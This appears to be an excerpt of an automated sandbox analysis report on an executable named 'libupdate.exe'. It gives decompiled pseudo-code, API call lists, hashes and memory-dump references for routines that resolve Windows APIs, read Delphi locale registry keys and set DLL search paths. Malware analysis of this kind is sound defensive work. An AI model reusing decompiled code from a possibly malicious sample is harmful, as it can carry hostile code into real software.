                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                    • API String ID: 1646373207-1816364905
                                                                    • Opcode ID: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                                    • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                                    • Opcode Fuzzy Hash: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                                    • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 45%
                                                                    			E005C8644(void* __eax, void* __ecx) {
				void* __ebx;
				void* _t1;
				void* _t4;
				void* _t8;
				intOrPtr* _t9;

				_t1 = __eax;
				_t4 = __eax;
				if( *0x6d57e8 == 0) {
					 *0x6d57ec = E00414020(_t4, _t8, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilter");
					 *_t9 = 0x6d57e8;
					_t1 = 1;
					asm("lock xchg [edx], eax");
				}
				if( *0x6d57ec != 0) {
					_t1 =  *0x6d57ec(_t4, 1);
				}
				return _t1;
			}








                                                                    0x005c8644
                                                                    0x005c8646
                                                                    0x005c864f
                                                                    0x005c8666
                                                                    0x005c866b
                                                                    0x005c8675
                                                                    0x005c867a
                                                                    0x005c867a
                                                                    0x005c8684
                                                                    0x005c8689
                                                                    0x005c8689
                                                                    0x005c8691

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                    • API String ID: 1646373207-2498399450
                                                                    • Opcode ID: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                                    • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                                    • Opcode Fuzzy Hash: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                                    • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 44%
                                                                    			E005C8820(void* __eax, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t7;
				intOrPtr* _t8;
				void* _t9;

				_t9 = __eax;
				_t8 = E00414020(_t7, _t9, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonDestroy");
				if(_t8 == 0) {
					L2:
					return 0;
				} else {
					_push(_t9);
					if( *_t8() != 0) {
						return 1;
					} else {
						goto L2;
					}
				}
			}








                                                                    0x005c8822
                                                                    0x005c8839
                                                                    0x005c883d
                                                                    0x005c8846
                                                                    0x005c884a
                                                                    0x005c883f
                                                                    0x005c883f
                                                                    0x005c8844
                                                                    0x005c884f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c8844

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                    • API String ID: 1646373207-260599015
                                                                    • Opcode ID: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                                    • Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
                                                                    • Opcode Fuzzy Hash: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                                    • Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E006B9800(void* __eflags) {
				intOrPtr* _t2;
				void* _t4;
				void* _t5;

				_t2 = E00414020(_t4, _t5, GetModuleHandleW(L"user32.dll"), L"DisableProcessWindowsGhosting");
				if(_t2 != 0) {
					return  *_t2();
				}
				return _t2;
			}






                                                                    0x006b9810
                                                                    0x006b9817
                                                                    0x00000000
                                                                    0x006b9819
                                                                    0x006b981b

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                    • API String ID: 1646373207-834958232
                                                                    • Opcode ID: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                                    • Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
                                                                    • Opcode Fuzzy Hash: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                                    • Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: libupdate.exe PID: 6948 Parent PID: 6876 libupdate.exeCOMMON

                                                                    Executed Functions

                                                                    Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}













                                                                    0x0040b04a
                                                                    0x0040b04d
                                                                    0x0040b050
                                                                    0x0040b053
                                                                    0x0040b055
                                                                    0x0040b05b
                                                                    0x0040b062
                                                                    0x0040b063
                                                                    0x0040b068
                                                                    0x0040b06b
                                                                    0x0040b070
                                                                    0x0040b076
                                                                    0x0040b07f
                                                                    0x0040b08f
                                                                    0x0040b09c
                                                                    0x0040b0a3
                                                                    0x0040b0aa
                                                                    0x0040b0ac
                                                                    0x0040b0bd
                                                                    0x0040b0ca
                                                                    0x0040b0d1
                                                                    0x0040b0d8
                                                                    0x0040b0dc
                                                                    0x0040b0dc
                                                                    0x0040b0d8
                                                                    0x0040b0e3
                                                                    0x0040b0e6
                                                                    0x0040b0e9
                                                                    0x0040b0f6
                                                                    0x0040b103

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                                      • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                      • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                    • String ID:
                                                                    • API String ID: 3216391948-0
                                                                    • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                    • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                                    • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                    • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 46%
                                                                    			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}








                                                                    0x0040aefd
                                                                    0x0040aefe
                                                                    0x0040af04
                                                                    0x0040af0b
                                                                    0x0040af0c
                                                                    0x0040af11
                                                                    0x0040af14
                                                                    0x0040af27
                                                                    0x0040af34
                                                                    0x0040af37
                                                                    0x0040af37
                                                                    0x0040af3e
                                                                    0x0040af41
                                                                    0x0040af44
                                                                    0x0040af51

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                    • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                                    • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                    • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}





























                                                                    0x004b5115
                                                                    0x004b5117
                                                                    0x004b511c
                                                                    0x004b511c
                                                                    0x004b511e
                                                                    0x004b5120
                                                                    0x004b5120
                                                                    0x004b5128
                                                                    0x004b5129
                                                                    0x004b512e
                                                                    0x004b5131
                                                                    0x004b5134
                                                                    0x004b513b
                                                                    0x004b536d
                                                                    0x004b536f
                                                                    0x004b5372
                                                                    0x004b5375
                                                                    0x004b5387
                                                                    0x004b5141
                                                                    0x004b514b
                                                                    0x004b514d
                                                                    0x004b5154
                                                                    0x004b515a
                                                                    0x004b5167
                                                                    0x004b516b
                                                                    0x004b5172
                                                                    0x004b5177
                                                                    0x004b5179
                                                                    0x004b5179
                                                                    0x004b516b
                                                                    0x004b517c
                                                                    0x004b5188
                                                                    0x004b518f
                                                                    0x004b5196
                                                                    0x004b5196
                                                                    0x004b519b
                                                                    0x004b51a8
                                                                    0x004b51b4
                                                                    0x004b51ba
                                                                    0x004b51c1
                                                                    0x004b51c6
                                                                    0x004b51c6
                                                                    0x004b51d4
                                                                    0x004b51e0
                                                                    0x004b51e0
                                                                    0x004b51f3
                                                                    0x004b51fb
                                                                    0x004b520e
                                                                    0x004b5216
                                                                    0x004b5229
                                                                    0x004b5231
                                                                    0x004b5244
                                                                    0x004b524c
                                                                    0x004b525f
                                                                    0x004b5267
                                                                    0x004b527a
                                                                    0x004b5282
                                                                    0x004b5295
                                                                    0x004b529d
                                                                    0x004b52b0
                                                                    0x004b52b8
                                                                    0x004b52cb
                                                                    0x004b52d3
                                                                    0x004b52e6
                                                                    0x004b52ee
                                                                    0x004b5301
                                                                    0x004b5309
                                                                    0x004b531c
                                                                    0x004b5324
                                                                    0x004b5337
                                                                    0x004b533f
                                                                    0x004b533f
                                                                    0x004b51b4
                                                                    0x004b534a
                                                                    0x004b5351
                                                                    0x004b5358
                                                                    0x004b5358
                                                                    0x004b5360
                                                                    0x004b5367
                                                                    0x004b536b
                                                                    0x004b536b
                                                                    0x00000000
                                                                    0x004b5367

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                                    • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                                      • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                                      • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                                    • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                                    • API String ID: 2248137261-3182217745
                                                                    • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                    • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                                    • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                    • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                    0x0040ab19
                                                                    0x0040ab1b
                                                                    0x0040ab22
                                                                    0x0040ab24
                                                                    0x0040ab2a
                                                                    0x0040ab31
                                                                    0x0040ab32
                                                                    0x0040ab37
                                                                    0x0040ab3a
                                                                    0x0040ab41
                                                                    0x0040ab6d
                                                                    0x0040ab43
                                                                    0x0040ab51
                                                                    0x0040ab51
                                                                    0x0040ab7a
                                                                    0x0040ad27
                                                                    0x0040ad29
                                                                    0x0040ad2c
                                                                    0x0040ad2f
                                                                    0x0040ad3c
                                                                    0x0040ab80
                                                                    0x0040ab82
                                                                    0x0040ab9a
                                                                    0x0040aba1
                                                                    0x0040ac41
                                                                    0x0040ac43
                                                                    0x0040ac44
                                                                    0x0040ac49
                                                                    0x0040ac4c
                                                                    0x0040ac5a
                                                                    0x0040ac7b
                                                                    0x0040acca
                                                                    0x0040acd4
                                                                    0x0040acec
                                                                    0x0040acf6
                                                                    0x0040acf6
                                                                    0x0040ac7d
                                                                    0x0040ac85
                                                                    0x0040ac9f
